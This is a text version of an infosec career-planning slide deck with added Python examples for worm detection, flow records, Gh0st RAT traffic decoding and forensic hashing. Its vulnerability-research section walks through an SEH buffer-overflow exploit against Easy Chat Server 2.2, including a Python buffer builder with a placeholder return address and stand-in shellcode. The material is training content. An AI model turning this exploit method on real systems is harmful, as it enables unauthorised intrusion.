Effective InfoSec Career Planning - yehg.net / hax0r/r0lan/Effective InfoSec Career Planning.pdf

Posted on 07-Mar-2018


Effective InfoSec Career Planning

aka

Building InfoSec Professional Life

Purpose

This presentation is dedicated to those who want to

build an Information Security professional career.

About me

• Currently working at one of the CERT teams

• One bit of YEHG (http://yehg.net)

• Holding Offensive Security (OSCP) + CTG (CED, CWSE) + some InfoSec certs…

• Doing vuln research & artifact analysis

• Often a participant in cyber drills, CTFs & wargame challenges.

Agenda

InfoSec Nowadays

InfoSec Trends

Security Analyst/Consultant

Incident Handling

Artifact Analysis

Computer Forensics

Security Engineering

Policy Maker

InfoSec’ Hall of Fame

Conclusion

Q & A

InfoSec Nowadays

InfoSec Trends (the career tracks covered below)

Policy Maker

Incident Handling

Cyber Forensics

Artifact Analysis

Security Analysis

Security Engineering

InfoSec Trends: Incident Handling

- SOC Operation Staff

- Incident Handling Engineer

- Incident Responder

Incident Handling

• The preparation, detection,

management and resolution of incidents

or events that may occur in the

information system.

Incident Handling

• Key Responsibilities

– Detect & respond to security incidents

– Reduce losses

– Reduce downtime

– Identify the attack vector

– Provide focus & resources for the documentation, planning and training of an incident response capability

Incident Handling

• Strong technical expertise in:

– Network protocols, including TCP/IP fundamentals

– Operating systems (Windows and UNIX)

– Scripting languages (such as Python, Perl, Bash, PowerShell or similar) in an incident handling environment

• Knowledge of banking systems, enterprise systems and infrastructure

• Knowledge of virtual environments (VMware)

• Knowledge of security products such as anti-virus, IDS, IPS, proxy, SIEM, log management tools, etc.

• Knowledge of vulnerability management

• Knowledge of malware & hacking techniques, etc.

Incident Handling

• Six Step Approach

1. Preparation

2. Identification & Initial Response

3. Containment

4. Remediation

5. Recovery

6. Follow-up

Incident Handling

• Sample Case Study

– Worm Infection

Incident Handling

• Preparation

– Contact list of everyone who will be involved in the crisis cell.

– Make sure that analysis tools are up, functional and not compromised.

– Make sure you have a network architecture map.

– Perform a continuous security watch.

Incident Handling

• Identification & Initial Response

• Detect the infection

– Information coming from several sources should be gathered & analyzed:

– Antivirus logs & IDS logs

– Suspicious connection attempts & traffic

– A large number of locked accounts

– High load or system freezes

– High volumes of e-mail sent
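The symptoms above only become a confident "we have a worm" call when several of them point at the same host. The following is an added example (not code from the slides) that correlates three of the sources listed: firewall denies, domain-controller account lockouts and anti-virus detections. The key=value log format, the thresholds (20 distinct targets on one port, 5 accounts locked, per one-minute window) and the sample lines are constructed for the example; real products need their own parsers, but the correlation logic is the same.

```python
"""Correlate worm-infection symptoms across firewall, domain-controller and
anti-virus logs. Added example for the "detect the infection" step; it is not
code from the original slides. The log format is a constructed, simplified
key=value syslog style; real products need their own parsers."""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=1)   # assumed detection window
SCAN_THRESHOLD = 20             # distinct destinations on one port inside WINDOW
LOCKOUT_THRESHOLD = 5           # distinct accounts locked by one caller inside WINDOW

# Constructed sample: 10.0.5.23 sweeps port 445, locks out six accounts and
# trips the anti-virus; 10.0.5.40 and 10.0.5.77 are benign noise.
SAMPLE_LOGS = (
    [f"2018-03-07T10:00:{i:02d} fw src=10.0.5.23 dst=10.0.5.{100 + i} dport=445 action=deny"
     for i in range(25)]
    + [f"2018-03-07T10:00:{30 + i:02d} dc eventid=4740 user=user{i} caller=10.0.5.23"
       for i in range(6)]
    + ["2018-03-07T10:00:40 av ip=10.0.5.23 event=detected name=Worm.Generic",
       "2018-03-07T10:00:41 av ip=10.0.5.77 event=detected name=Adware.Generic",
       "2018-03-07T10:00:42 fw src=10.0.5.40 dst=10.0.5.1 dport=443 action=allow",
       "2018-03-07T10:00:43 fw src=10.0.5.40 dst=10.0.5.2 dport=53 action=allow",
       "2018-03-07T10:00:44 dc eventid=4740 user=bob caller=10.0.5.40"]
)


def parse(line):
    """'<iso-timestamp> <source> k=v k=v ...' -> dict (constructed format)."""
    ts, source, *pairs = line.split()
    fields = dict(p.split("=", 1) for p in pairs)
    fields["ts"] = datetime.fromisoformat(ts)
    fields["source"] = source
    return fields


def max_distinct_in_window(events, window):
    """events: list of (timestamp, value). Largest number of distinct values
    seen inside any interval of length `window` (two-pointer sliding window)."""
    events = sorted(events)
    counts, best, start = defaultdict(int), 0, 0
    for ts, value in events:
        counts[value] += 1
        while events[start][0] < ts - window:
            old = events[start][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            start += 1
        best = max(best, len(counts))
    return best


def find_worm_symptoms(lines):
    """Return {ip: [indicator, ...]} for hosts showing two or more independent
    worm symptoms (port sweep, lockout burst, AV detection)."""
    sweeps = defaultdict(list)    # (src, dport) -> [(ts, dst)]
    lockouts = defaultdict(list)  # caller ip   -> [(ts, account)]
    av_hits = defaultdict(set)    # ip          -> {malware name}
    for line in lines:
        e = parse(line)
        if e["source"] == "fw":
            sweeps[(e["src"], e["dport"])].append((e["ts"], e["dst"]))
        elif e["source"] == "dc" and e.get("eventid") == "4740":   # account locked out
            lockouts[e["caller"]].append((e["ts"], e["user"]))
        elif e["source"] == "av" and e.get("event") == "detected":
            av_hits[e["ip"]].add(e["name"])

    indicators = defaultdict(list)
    for (src, dport), ev in sweeps.items():
        n = max_distinct_in_window(ev, WINDOW)
        if n >= SCAN_THRESHOLD:
            indicators[src].append(f"contacted {n} hosts on port {dport} within {WINDOW}")
    for caller, ev in lockouts.items():
        n = max_distinct_in_window(ev, WINDOW)
        if n >= LOCKOUT_THRESHOLD:
            indicators[caller].append(f"locked out {n} accounts within {WINDOW}")
    for ip, names in av_hits.items():
        indicators[ip].append("AV detection: " + ", ".join(sorted(names)))

    # One indicator is a lead to check; two or more independent ones on the
    # same host is what identification should escalate to the crisis cell.
    return {ip: inds for ip, inds in indicators.items() if len(inds) >= 2}


if __name__ == "__main__":
    for ip, inds in find_worm_symptoms(SAMPLE_LOGS).items():
        print(ip, "->", "; ".join(inds))
```

A single indicator (the adware hit on 10.0.5.77) is deliberately not escalated: the point of the identification step is to combine sources, and a port sweep plus a lockout burst plus an AV hit on one host is a much stronger lead than any one of them.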

Incident Handling

• Identification & Initial Response

• Identify the infection

– Analyze the symptoms to identify the worm, its propagation vectors and countermeasures.

– Leads can be found in:

• CERT bulletins, external support contacts (antivirus companies, etc.), security websites (Secunia, SecurityFocus, etc.)

– Notify the Chief Information Security Officer.

– Contact your CERT if required.

Incident Handling

• Identification & Initial Response

• Assess the perimeter of the infection

– Define the boundaries of the infection

– Identify the business impact of the infection if

possible

Incident Handling

• Containment

1. Disconnect the infected area from the Internet.

2. Isolate the infected area. Disconnect it from any network.

3. If business-critical traffic cannot be disconnected, allow it only after ensuring that it cannot be an infection vector, or find validated workarounds.

Incident Handling

• Containment

4. Neutralize the propagation vectors. A propagation vector can be anything from network traffic to a software flaw. Relevant countermeasures have to be applied (patch, traffic blocking, disabling devices, etc.). For example, the following techniques can be used:

– Patch deployment tools,

– Windows GPO,

– Firewall rules,

– Operational procedures.

Repeat steps 2 to 4 on each sub-area of the infected area until the worm stops spreading.

Incident Handling

• Remediation

• The following resources should be considered:

– Vendor fixes (Microsoft, Oracle, etc.)

– Antivirus signature databases

– External support contacts

– Security websites

• Test the disinfection process and make sure that it works properly without damaging any service.

Incident Handling

• Recovery

• Reopen the network traffic that was used as a propagation method by the worm.

• Reconnect sub-areas together.

• Reconnect the mobile laptops to the area.

• Reconnect the area to your local network.

• Reconnect the area to the Internet.

• All of these steps shall be made step by step, and technical monitoring shall be enforced by the crisis team.

Incident Handling

• Follow-up

• Report: A crisis report should be written and made available to all of the actors of the crisis management cell. The following themes should be described:

– Initial cause of the infection

– Actions and timelines of every important event

– What went right

– What went wrong

– Incident cost

Incident Handling

• Resources & Lab

– https://www.enisa.europa.eu/activities/cert/training/training-resources/setting-up-a-cert#triage-and-basic-incident-handling

– https://www.enisa.europa.eu/activities/cert/training/training-resources/setting-up-a-cert#incident-handling-procedure-testing

Incident Handling

• Certification

– GCIH (GIAC Certified Incident Handler, SANS)

– GCIA (GIAC Certified Intrusion Analyst, SANS)

– C)IHE (mile2 Certified Incident Handling Engineer)

– ECIH (EC-Council Certified Incident Handler)

Incident Handling

• Book recommendations

– Blue Team Handbook: Incident Response Edition

– The Computer Incident Response Planning Handbook

– Computer Incident Response and Forensics Team Management

InfoSec Trends: Cyber Forensics

- Network Forensic Expert

- Computer Forensic Expert

- Cyber Forensic Investigator

Network Forensics

• Two types of Network Forensics

1. Flow based

2. Packet based

Network Forensics

• Flow-based network security analysis centers on the concept of a network flow rather than on individual packets.

• A flow record is a summarized indicator that a certain network flow took place: two hosts communicated with each other at some point in the past.

• NetFlow is like a phone bill:

– You know who called whom, when and for how long, but not what was said.

Network Forensics

• Packet-based network security analysis, unlike flow-based solutions, does not rely on third-party components to generate metadata or summary information about the network traffic.

• Instead, all analysis is based entirely on the raw packets actually observed as they traverse the network links. It focuses on each packet or a group of packets.

Network Forensics

Figure: NetFlow record vs. pcap. A NetFlow record keeps per-flow metadata only: source IP, destination IP, source port, destination port, protocol, time info, TCP flags, byte counts, packet counts and ICMP info. A pcap keeps every packet in full, headers and payload.
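To make the "phone bill" concrete, here is an added example (not from the slides, and not how Argus or a NetFlow exporter is implemented internally) that aggregates individual packets into flow records the way such tools do: group by protocol and unordered endpoint pair, take the sender of the first packet as the initiator, count packets and bytes per direction, union the TCP flags, and start a new record after an idle gap. The Packet objects and the addresses in them are constructed; a real pipeline would read them from a pcap. The payload field is kept in the packet only to show that it never reaches the flow record.

```python
"""Aggregate raw packets into NetFlow/Argus-style flow records. Added example
(not from the original slides): shows what a flow record keeps (the "phone
bill") and what it throws away (the payload). Packets are constructed by hand."""
from dataclasses import dataclass, field


@dataclass
class Packet:
    ts: float        # seconds since capture start
    src: str
    dst: str
    proto: str       # "tcp", "udp", "icmp"
    sport: int       # 0 for icmp
    dport: int
    flags: str       # TCP flag letters, e.g. "SA"
    length: int      # IP total length in bytes
    payload: bytes   # present in the pcap, absent from the flow record


@dataclass
class Flow:
    src: str
    sport: int
    dst: str
    dport: int
    proto: str
    start: float
    end: float
    pkts_fwd: int = 0
    pkts_rev: int = 0
    bytes_fwd: int = 0
    bytes_rev: int = 0
    flags: set = field(default_factory=set)

    def summary(self):
        """One 'phone bill' line: endpoints, timing, volume, flags. No content."""
        return (f"{self.start:9.3f}-{self.end:9.3f} {self.proto:4} {self.src}:{self.sport} -> "
                f"{self.dst}:{self.dport} pkts={self.pkts_fwd}/{self.pkts_rev} "
                f"bytes={self.bytes_fwd}/{self.bytes_rev} flags={''.join(sorted(self.flags))}")


def build_flows(packets, idle_timeout=60.0):
    """Group packets by protocol + unordered endpoint pair. The sender of the
    first packet is the initiator (forward direction); a gap longer than
    idle_timeout closes the record and starts a new one, as exporters do."""
    active, finished = {}, []
    for p in sorted(packets, key=lambda p: p.ts):
        key = (p.proto, *sorted([(p.src, p.sport), (p.dst, p.dport)]))
        f = active.get(key)
        if f is not None and p.ts - f.end > idle_timeout:
            finished.append(active.pop(key))
            f = None
        if f is None:
            f = active[key] = Flow(p.src, p.sport, p.dst, p.dport, p.proto, p.ts, p.ts)
        if (p.src, p.sport) == (f.src, f.sport):
            f.pkts_fwd += 1
            f.bytes_fwd += p.length
        else:
            f.pkts_rev += 1
            f.bytes_rev += p.length
        f.flags.update(p.flags)
        f.end = p.ts
    return finished + list(active.values())


# Constructed capture: a DNS lookup, one HTTP connection, and the same 5-tuple
# reused an hour later (which the idle timeout turns into a separate flow).
CLIENT, RESOLVER, WEB = "10.0.0.5", "10.0.0.1", "203.0.113.10"
PACKETS = [
    Packet(0.000, CLIENT, RESOLVER, "udp", 53124, 53, "", 60, b"\x12\x34\x01\x00 dns query"),
    Packet(0.010, RESOLVER, CLIENT, "udp", 53, 53124, "", 76, b"\x12\x34\x81\x80 dns answer"),
    Packet(0.020, CLIENT, WEB, "tcp", 51000, 80, "S", 60, b""),
    Packet(0.030, WEB, CLIENT, "tcp", 80, 51000, "SA", 60, b""),
    Packet(0.031, CLIENT, WEB, "tcp", 51000, 80, "A", 52, b""),
    Packet(0.032, CLIENT, WEB, "tcp", 51000, 80, "PA", 160, b"GET /login?user=admin HTTP/1.1\r\n\r\n"),
    Packet(0.050, WEB, CLIENT, "tcp", 80, 51000, "PA", 1500, b"HTTP/1.1 200 OK\r\n\r\n<html>..."),
    Packet(0.060, CLIENT, WEB, "tcp", 51000, 80, "FA", 52, b""),
    Packet(0.061, WEB, CLIENT, "tcp", 80, 51000, "FA", 52, b""),
    Packet(3600.0, CLIENT, WEB, "tcp", 51000, 80, "S", 60, b""),
]

if __name__ == "__main__":
    for flow in build_flows(PACKETS):
        print(flow.summary())
```

The flow view answers "did 10.0.0.5 talk to 203.0.113.10 on port 80, when, and how much?" but the request line `GET /login?user=admin` is gone; for that you need the pcap, which is exactly the trade-off between the two approaches on the previous slides.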

Network Forensics

• Some useful tools

– Argus

– Tcpdump

– Snort

– Chopshop

Network Forensics

• Argus

– Converting a pcap to flow records:

• argus -r packet.pcap -w packet.argus

• ChopShop

– http://www.github.com/MITRECND/chopshop

– MITRE-developed packet framework for protocol decoders

Network Forensics

• Sample Case Study

– Forensics on Gh0st RAT

• Detect in Wireshark

• Detect with custom Snort rules

• Decode with ChopShop
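The detection and decode slides were screenshots, so here is an added example (not the ChopShop gh0st_decode module and not the Snort rule from the deck) that does the same two things on a reassembled TCP stream. It relies on the documented Gh0st wire format that the public source and ChopShop implement: a 5-byte magic (default "Gh0st"; variants change it), a little-endian uint32 total message length including the header, a little-endian uint32 uncompressed length, then a zlib stream whose first byte is the command token. `looks_like_gh0st` is the check a content rule makes on the first bytes of a segment; `decode_stream` parses complete messages and hands back the partial tail so the caller can append the next segment. The sample message is constructed locally and its token byte is arbitrary.

```python
"""Parse the Gh0st RAT wire format from a reassembled TCP stream. Added
example, not the ChopShop module from the slides. Format (public Gh0st source,
ChopShop gh0st_decode): 5-byte magic, uint32 LE total length (header
included), uint32 LE uncompressed length, zlib-compressed body. The sample
traffic below is constructed."""
import struct
import zlib

HEADER = struct.Struct("<5sII")   # magic, total length, uncompressed length
DEFAULT_MAGIC = b"Gh0st"


def encode(payload, magic=DEFAULT_MAGIC):
    """Build one message the way the implant does (used here to create test data)."""
    body = zlib.compress(payload)
    return HEADER.pack(magic, HEADER.size + len(body), len(payload)) + body


def looks_like_gh0st(segment, magic=DEFAULT_MAGIC):
    """The check a detection rule makes on a segment: magic at offset 0 and a
    total length that at least covers the header."""
    if len(segment) < HEADER.size:
        return False
    m, total, _ = HEADER.unpack_from(segment)
    return m == magic and total >= HEADER.size


def decode_stream(buf, magic=DEFAULT_MAGIC):
    """Return (messages, leftover). Each message is the decompressed payload,
    whose first byte is the Gh0st command token. leftover is an incomplete
    trailing message; append the next TCP segment to it and call again."""
    messages = []
    while len(buf) >= HEADER.size:
        m, total, size = HEADER.unpack_from(buf)
        if m != magic or total < HEADER.size:
            raise ValueError("stream is not Gh0st traffic (or uses a different magic)")
        if len(buf) < total:
            break                                   # wait for the rest of this message
        data = zlib.decompress(buf[HEADER.size:total])
        if len(data) != size:
            raise ValueError("uncompressed length field does not match body")
        messages.append(data)
        buf = buf[total:]
    return messages, buf


# Constructed sample: an arbitrary token byte followed by host information.
SAMPLE_PAYLOAD = b"\x65" + b"ENG-USTXHOU-148\x00Windows XP SP3\x00"
SAMPLE_MESSAGE = encode(SAMPLE_PAYLOAD)


def demo_split_delivery():
    """Deliver the sample in two TCP segments, as a capture often does."""
    cut = 9                                          # inside the 13-byte header
    msgs, rest = decode_stream(SAMPLE_MESSAGE[:cut])
    assert msgs == [] and rest == SAMPLE_MESSAGE[:cut]
    return decode_stream(rest + SAMPLE_MESSAGE[cut:])


if __name__ == "__main__":
    for msg in decode_stream(SAMPLE_MESSAGE)[0]:
        print("token", msg[0], "data", msg[1:])
```

Two practitioner notes: the magic is configurable in the builder, so a rule that only matches "Gh0st" misses renamed variants (hence the `magic` parameter), and the two length fields give you a cheap consistency check that keeps a decoder from zlib-bombing itself on garbage that merely starts with the right five bytes.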

Network Forensics

• Resources

– Collection of pcaps for forensics practice

– http://www.netresec.com/?page=PcapFiles

Computer Forensic

• Identification

• Extraction

• Documentation

• Preservation

Cyber Forensic

• Key Responsibilities

– Receive, evaluate and initiate the

processing of cyber forensic investigations

– Search and seizure of physical and logical

evidence

– Imaging of hard disk drives, memory and

other digital storage media

– Network packet capture and analysis

– Provision of report and statements

Computer Forensic

Figure: the forensic process runs from the scene of crime (identification, seizure, preservation) to the forensics lab (acquisition, authentication, analysis, presentation).

Computer Forensic

What to carry?

• Notepad, sketch pads, labels…

• Blank CD/DVD

• Pen drives

• Camera

Computer Forensics

Storage containers: anti-static bags, plastic bubble wrap

Computer Forensics

Write Blocker: A forensic

disk controller or hardware

write-block device is a

specialized type of

computer hard disk

controller made for the

purpose of gaining read-

only access to computer

hard drives without the risk

of damaging the drive's

contents.

Computer Forensics

• Forensic steps: Scene of Crime

– Capture volatile data (RAM, router state, etc.) before anything is powered off.

– Photograph and video the scene of crime.

– Identify digital storage media.

– Draw the network topology.

Computer Forensics

Questions to be asked:

• Login details

– Usernames

– Passwords

• Encryption

• Files of interest

• E-mail accounts

• Internet Service Providers

• Off-site storage

• Hidden storage devices

Computer Forensics

Labeling:

Computer Forensics

Seizure:

• Seizure is the process of capturing the suspect computer or storage media for evidence collection.

• The case-related reference documents should also be seized from the crime scene.

Computer Forensics

Seizure example:

• In case of economic crime:

• Account book details

• Passbook details

• Bank transaction details

• ATM credit/debit card details, etc.

Computer Forensics

Seizure example:

• In case of forged documents:

– Academic certificates

– Bill receipts

– Passport

– Legal property papers, etc.

Computer Forensics

Packing and transportation:

• Properly document and label the evidence before packaging.

• Use anti-static wrap or bubble wrap for magnetic media.

• Avoid folding, bending or scratching the computer media.

Computer Forensics

Packing and transportation:

• While transporting, place the computer securely on the floor of the vehicle, where the ride is smooth.

• Keep radio transmissions, electromagnetic emissions and moisture away from the digital evidence.

Computer Forensics

Acquisition:

• Use write-blocker devices:

• Thumbscrew

• FastBloc

• Tableau

Computer Forensics

Acquisition:

• Making a forensic duplicate of the suspect storage media is acquisition.

• A forensic duplicate is a file that contains every bit of information from the source disk.

• It is made using software or hardware.

Computer Forensics

Acquisition:

• Using a software tool requires a hardware write blocker at the source end.

– FastBloc FE

– Tableau

– EnCase (software)

– FTK Imager

Computer Forensics

Authentication:

• Hash value

– Verifies the integrity of the forensic duplicate: the hash of the image must equal the hash of the source.

– Also known as a message digest or fingerprint. It is not a digital signature (a signature additionally binds the digest to a key), but it proves that the duplicate matches the source bit for bit.
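The acquisition and authentication steps together, as an added example (not from the slides, and not how FTK Imager or EnCase implement it): copy every byte of the source to an image while hashing the bytes as they are read, then hash the image independently and compare. The 'disk' is a constructed temporary file; in a real acquisition the source sits behind a write blocker and the recorded digests go into the chain-of-custody notes. SHA-256 is computed alongside MD5 because MD5 collisions exist and a report that only carries MD5 is easier to challenge.

```python
"""Forensic duplicate with hash authentication. Added example, not from the
slides; it does in Python what dd + md5sum/sha256sum (or an imager's verify
step) do: copy every byte, hash the source as it is read, hash the image
afterwards, compare. The "disk" is a constructed temporary file."""
import hashlib
import os
import tempfile

BLOCK_SIZE = 1 << 20              # 1 MiB read size; does not affect the digests
ALGORITHMS = ("md5", "sha256")    # MD5 for older reports, SHA-256 because MD5 collisions exist


def hash_file(path, algorithms=ALGORITHMS):
    """Stream the file once and return {algorithm: hexdigest}."""
    digests = {name: hashlib.new(name) for name in algorithms}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(BLOCK_SIZE), b""):
            for d in digests.values():
                d.update(chunk)
    return {name: d.hexdigest() for name, d in digests.items()}


def acquire(source, image, algorithms=ALGORITHMS):
    """Bit-for-bit copy of `source` into `image`. Returns the source digests,
    computed from the very bytes that were written, so the image can be
    authenticated later without touching the source again."""
    digests = {name: hashlib.new(name) for name in algorithms}
    with open(source, "rb") as src, open(image, "wb") as dst:
        for chunk in iter(lambda: src.read(BLOCK_SIZE), b""):
            for d in digests.values():
                d.update(chunk)
            dst.write(chunk)
    return {name: d.hexdigest() for name, d in digests.items()}


def verify(image, expected):
    """True only if every recorded digest matches the image."""
    actual = hash_file(image, expected.keys())
    return all(actual[name] == value for name, value in expected.items())


def demo():
    """Acquire a constructed ~3 MiB 'disk', verify, flip one bit in the image,
    verify again. Returns (intact, tampered) -> (True, False)."""
    with tempfile.TemporaryDirectory() as tmp:
        source = os.path.join(tmp, "suspect.dd")
        image = os.path.join(tmp, "image.dd")
        with open(source, "wb") as fh:
            fh.write(os.urandom(3 * BLOCK_SIZE + 123))   # not a block multiple on purpose
        recorded = acquire(source, image)
        intact = verify(image, recorded)
        with open(image, "r+b") as fh:                   # simulate a damaged/altered image
            fh.seek(BLOCK_SIZE + 7)
            b = fh.read(1)
            fh.seek(BLOCK_SIZE + 7)
            fh.write(bytes([b[0] ^ 0x01]))
        tampered = verify(image, recorded)
    return intact, tampered


if __name__ == "__main__":
    print("intact, tampered =", demo())
```

Hashing during the copy rather than in a second pass over the source matters with failing drives: every extra read of the evidence is a risk, while the image can be re-read as often as needed.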

Computer Forensics

Analysis:

• The process of searching for crime-relevant data and extracting it.

• The analyst has to search data in:

– Deleted files, unallocated space, log entries, system files, cookies, slack space, free space, registry entries, printer spool files, keywords

Computer Forensics

Free digital forensics tools

• SANS SIFT

• ProDiscover Basic

• Volatility

• The Sleuth Kit (+Autopsy)

• FTK Imager

• DEFT

Cyber Forensics

• Book Recommendation

– Guide to Computer Forensics and Investigations

– Kingpin: How One Hacker Took Over the Billion-

Dollar Cybercrime Underground

– Digital Forensics with Open Source Tools

Cyber Forensics

• Certification

– CHFI (EC-Council)

– Certified Computer Forensics Examiner (CCFE) (IACRB)

– GIAC Certified Forensic Examiner (GCFE)

InfoSec Trends: Artifact Analysis

- Malware Analyst

- Reverse Engineering Specialist

Artifact Analysis

• Key responsibilities

– Perform Malware Analysis

– Perform Attack Analysis

Artifact Analysis

• Type of Malware Analysis

– Static Malware Analysis

– Dynamic Malware Analysis

Artifact Analysis

• Static Malware Analysis

– Dissecting the different resources of the binary file and studying each component without running it.

– The binary file can also be disassembled (reverse engineered) using a disassembler such as IDA.

– A malware analyst can then make sense of the assembly instructions and form a picture of what the program is meant to do.

Artifact Analysis

• Static Malware Analysis

– Some useful tools

• PEview

• Depends (Dependency Walker)

• PEBrowse Pro

• objdump

• IDA Pro

• Resource Hacker

• strings

Artifact Analysis

• Dynamic Malware Analysis

– Watching and logging the behavior of the malware while it runs on a host. Virtual machines and sandboxes are used extensively for this type of analysis.

– The malware is debugged while running, using a debugger such as GDB or WinDbg, to watch its behavior step by step as its instructions are executed by the processor, and their live effects on RAM.

Artifact Analysis

• Dynamic Malware Analysis

– Some useful tools

• Sysinternals Suite

• Process Explorer

• Regshot

• UN-Pack

• OllyDbg

• Port Explorer

Artifact Analysis

• Sample Case Study

– Memory analysis on Gh0st RAT (continuation of the network forensics case study)

Artifact Analysis

• The C2 client at 58.64.132.141 was communicating with 172.16.150.20, whose local hostname was ENG-USTXHOU-148.

• Loading the memdump.bin file into Volatility's imageinfo module confirms what we saw in the Gh0st data: this machine is running Windows XP Service Pack 3.

Artifact Analysis

Memory analysis walkthrough (Volatility output shown on the slides):

– Take a look at the output of connscan.

– The output of pstree shows that the process with PID 1024 is svchost.exe.

– Dig into svchost a little more by running the dlllist module against it.

– There is an abnormal DLL named 6to4ex.dll listed.

– Dump the suspect file out using the dlldump module.

– Get the MD5 of the file and search for it on VirusTotal, to see if VirusTotal has seen it before.

– How did this machine become compromised in the first place?

strings memdump.bin | grep -C 30 58.64.132.141

Artifact Analysis

• Analysis Environment

– Santoku (https://santoku-linux.com/)

• a platform for mobile forensics, mobile

malware analysis and mobile application

security assessment.

– REMnux (https://remnux.org/)

• A Linux Toolkit for Reverse-Engineering and

Analyzing Malware

Artifact Analysis

• Book Recommendations

– Malware Analyst's Cookbook

– Practical Malware Analysis

Reverse Engineering

• Need to be familiar with IDA Pro/IDA Free and OllyDbg.

• Focus on a single architecture initially: x86, x86_64 or ARM.

• Try some crackme exercises (http://www.crackmes.de/).

Reverse Engineering

• Book recommendations

– Practical Reverse Engineering

– Reversing: Secrets of Reverse

Engineering

– The IDA Pro Book

Artifact Analysis

• Resources

– http://www.opensecuritytraining.info/MalwareDynamicAnalysis.html

– http://www.opensecuritytraining.info/LifeOfBinaries.html

– http://www.opensecuritytraining.info/ReverseEngineeringMalware.html

Artifact Analysis

• Certification

• CREA: Certified Reverse Engineering Analyst (IACRB)

• GREM: GIAC Reverse Engineering Malware (SANS FOR610)

InfoSec Trends: Security Analysis

- Penetration Tester

- Vulnerability Researcher

- Application Security Expert

- Mobile App Security Expert

Vulnerability Assessment

• Key Responsibilities

– Perform application and infrastructure penetration tests, as well as physical security reviews and social engineering tests, for clients

– Review and define requirements for information security solutions

– Participate in security assessments of networks, systems and applications

Vulnerability Research

• Learn reverse engineering before jumping into it.

• For starters: stack overflows, heap overflows and format string bugs.

• Practice bypassing SEH, ASLR, DEP, etc.

Vulnerability Research

• Some useful tools

– RATS - Rough Auditing Tool for Security

– RIPS - a static source code analyzer for PHP

– Immunity Debugger

– Burp Suite

– Peach Fuzzer

– Metasploit Framework

Vulnerability Research

• Sample Case Study

• Exploit EFS Software Easy Chat Server 2.2 (CVE-2004-2466)

Vulnerability Research

• First step

• Running Easy Chat Server on Windows XP SP3

Vulnerability Research

• Use Wireshark to capture a legitimate request and build the fuzzer from it.

Vulnerability Research

• Fuzzer

Vulnerability Research

• Attach the application to the debugger.

Vulnerability Research

• Run the fuzzer & check EIP.

Vulnerability Research

• EIP is not overwritten directly, so we check the SEH chain (Alt+S).

• The handler has been overwritten with 41414141 (our "A" characters); once the exception is passed to it, EIP is 41414141.

Vulnerability Research

• Structured Exception Handling (SEH) is

a Windows mechanism for handling

both hardware and software exceptions

consistently.

• The concept is quite simple — try to

execute a block of code and if an

error/exception occurs, do whatever the

“except” block (aka the exception

handler) says


• So to recap, we need the following for our basic SEH exploit:

– the offset to Next SEH (nSEH)

– jump code in nSEH to hop over the SEH record

– the address of a usable POP+POP+RET instruction sequence (in a module compiled without SafeSEH)

– shellcode

Vulnerability Research

• Create a pattern and edit the fuzzer to find the exact offset.

• Check the SEH chain & EIP.

• Find an appropriate memory location for the SEH bypass using the "!mona seh" command of mona.py.

• Generate the payload and add it to the fuzzer.

• Our fuzzer's buffer is modified as:

Buffer += "A"*216 + [nSEH] + [SEH] + Payload
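The pattern and buffer-layout steps above, as an added example (not the fuzzer from the slides, and it does not talk to the target): a Metasploit-style cyclic pattern, the reverse lookup that turns the dword seen in the SEH chain into the 216-byte offset, and a builder for `"A"*offset + nSEH + SEH + payload` with the checks you want before firing. `PPR_ADDR` is a placeholder, not a real address; the real POP POP RET comes from the `!mona seh` output. The shellcode is a constructed stand-in (NOP sled plus int3), and delivering the buffer over HTTP to Easy Chat Server is left to the fuzzer built from the Wireshark capture.

```python
"""Cyclic-pattern offset finding and SEH buffer layout for the Easy Chat
Server case study. Added example, not the slide deck's fuzzer; builds the
buffer offline only. PPR_ADDR is a placeholder (assumption): take the real
POP POP RET from "!mona seh". FAKE_SHELLCODE is a constructed stand-in."""
import string
import struct

PATTERN_MAX = 26 * 26 * 10 * 3   # 20280 bytes, the full Aa0..Zz9 pattern


def pattern_create(length):
    """Metasploit-style cyclic pattern Aa0Aa1Aa2...: every 4-byte window is
    unique within the pattern, so a dword read from SEH/EIP maps to one offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(value, length=PATTERN_MAX):
    """value: the dword seen in the debugger, as int or as 4 raw bytes.
    Returns the offset into the pattern, or -1 if it is not from the pattern."""
    needle = struct.pack("<I", value) if isinstance(value, int) else value
    return pattern_create(length).find(needle)


PPR_ADDR = 0xDEADBEEF                       # placeholder: replace with a real POP POP RET
NSEH = b"\xeb\x06\x90\x90"                  # short jmp +6: skips the 4-byte SEH record and lands past it
FAKE_SHELLCODE = b"\x90" * 16 + b"\xcc" * 4  # constructed stand-in (NOP sled + int3), not real shellcode


def build_seh_buffer(offset, ppr_addr=PPR_ADDR, payload=FAKE_SHELLCODE, total=1000):
    """Buffer = "A"*offset + [nSEH] + [SEH] + Payload, padded with "C" to `total`."""
    seh = struct.pack("<I", ppr_addr)
    if b"\x00" in seh:
        raise ValueError("address contains a NUL byte; a string copy would stop there")
    buf = b"A" * offset + NSEH + seh + payload
    if len(buf) > total:
        raise ValueError("payload too large for the buffer size that crashed the target")
    return buf + b"C" * (total - len(buf))


def locate_record(buf, ppr_addr=PPR_ADDR):
    """Sanity check before firing: where do nSEH and SEH actually sit in the buffer?"""
    seh = buf.find(struct.pack("<I", ppr_addr))
    return {"nseh_offset": seh - 4, "seh_offset": seh}


if __name__ == "__main__":
    # Step 1: send pattern_create(1000) instead of "A"*1000, read the SEH chain.
    seen_in_debugger = pattern_create(1000)[216:220]      # what the chain showed (simulated)
    offset = pattern_offset(seen_in_debugger)             # -> 216
    # Step 2: lay out the real buffer and confirm the record lands at the offset.
    buf = build_seh_buffer(offset)
    print("offset", offset, locate_record(buf))
```

The two `ValueError`s encode the checks that usually cost beginners an afternoon: a NUL in the POP POP RET address truncates the overflow, and a payload that pushes the buffer past the length that originally crashed the service may simply not reach the handler.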

Vulnerability Research

Rooted !!!

Security Analysis

• Book recommendations

– Hacking: The Art of Exploitation

– The Shellcoders Handbook

– The Art of Software Security

Assessment

Security Analysis

• Certification

• OSCP (Offensive Security Certified Professional)

• OSCE (Offensive Security Certified Expert)

• GPEN (GIAC Penetration Tester)

